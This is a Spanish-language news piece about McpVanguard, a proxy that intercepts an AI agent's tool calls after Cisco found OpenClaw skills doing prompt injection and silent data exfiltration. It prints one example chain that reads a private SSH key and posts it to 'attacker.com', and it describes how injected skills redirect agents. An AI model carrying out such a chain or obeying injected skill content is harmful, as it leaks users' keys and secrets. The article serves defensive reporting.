McpVanguard Proxy Bloquea la Exfiltración de Datos de Habilidad OpenClaw

En respuesta al descubrimiento del equipo de seguridad de IA de Cisco de que habilidades de terceros de OpenClaw realizaban exfiltración de datos silenciosa e inyección de prompts, un desarrollador ha lanzado McpVanguard, un proxy diseñado para situarse entre un agente de IA y sus herramientas para bloquear llamadas maliciosas antes de que se ejecuten.
El problema: Llamadas maliciosas encadenadas
El problema de seguridad no es un error en OpenClaw en sí, sino una consecuencia de que los agentes tengan acceso al sistema de archivos, ejecución de shell y llamadas de red sin límites de aplicación. Las pruebas de Cisco revelaron un patrón en el que llamadas individuales aparentemente inocentes se combinan para crear una brecha, como:
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)Ninguna de las llamadas parece maliciosa de forma aislada, pero juntas exfiltran datos sensibles. Según la fuente, ClawHub tuvo más de 820 habilidades maliciosas en su punto máximo, y CVE-2026-25253 permitió a los atacantes lograr ejecución remota de código a través de un solo enlace malicioso. La validación actual a nivel de habilidad no logra detectar estas secuencias de llamadas encadenadas.
La solución: Proxy McpVanguard
McpVanguard aborda esto interceptando llamadas entre el agente y sus herramientas. Utiliza tres métodos de detección:
- Coincidencia de patrones
- Puntuación de intención semántica
- Detección de cadenas de comportamiento a lo largo de toda la sesión
La instalación es mediante pip: pip install mcp-vanguard.
Capa más profunda: Protocolo VEX
El proyecto incluye una capa de seguridad más profunda llamada Protocolo VEX, descrita como un sistema de "grabadora de vuelo". Proporciona:
- Registros de auditoría Merkle para registro a prueba de manipulaciones
- Verificación de identidad del agente basada en TPM
- Aplicación a nivel de llamadas al sistema
El Protocolo VEX está construido en Rust y su desarrollo comenzó en diciembre de 2023, antes de que OpenClaw ganara popularidad generalizada. La fuente señala que NVIDIA ha lanzado recientemente NemoClaw para propósitos de seguridad similares, lo que indica que este tipo de amenaza no va a desaparecer.
Ambos proyectos están disponibles en GitHub:
📖 Read the full source: r/openclaw
👀 Ver también

Los parches de seguridad de OpenClaw corrigen la exposición de credenciales por código QR y vulnerabilidades de carga automática de complementos.
OpenClaw lanzó dos parches de seguridad que abordan vulnerabilidades críticas: los códigos QR incluían credenciales permanentes de puerta de enlace sin fecha de caducidad, y los complementos se cargaban automáticamente desde repositorios clonados sin confirmación del usuario. La versión 2026.3.12 corrige ambos problemas.

Seguridad de Agentes de IA: Más Allá de los Jailbreaks Hasta el Mal Uso de Herramientas y la Inyección de Prompts
Los agentes de IA que navegan por la web, ejecutan comandos y activan flujos de trabajo enfrentan riesgos de seguridad por inyección de instrucciones y mal uso de herramientas, donde contenido no confiable redirige herramientas legítimas como la ejecución de comandos y solicitudes HTTP.

OpenClaw Fortalecimiento de Seguridad: Protección Multicapa Contra Riesgos de Agentes Autónomos
Un desarrollador modificó la base de código de OpenClaw para agregar una pila de seguridad de múltiples capas que incluye un guardia de regex de denegación estricta, un desofuscador recursivo, un perfil de AppArmor e integración de auditoría para evitar comandos destructivos y exfiltración de datos por parte de agentes autónomos.

Aloja OpenClaw de forma segura en un VPS con Tailscale y más.
Configura OpenClaw de manera segura en un VPS utilizando Tailscale, fail2ban, UFW y más, evitando la exposición pública y fortaleciendo la defensa.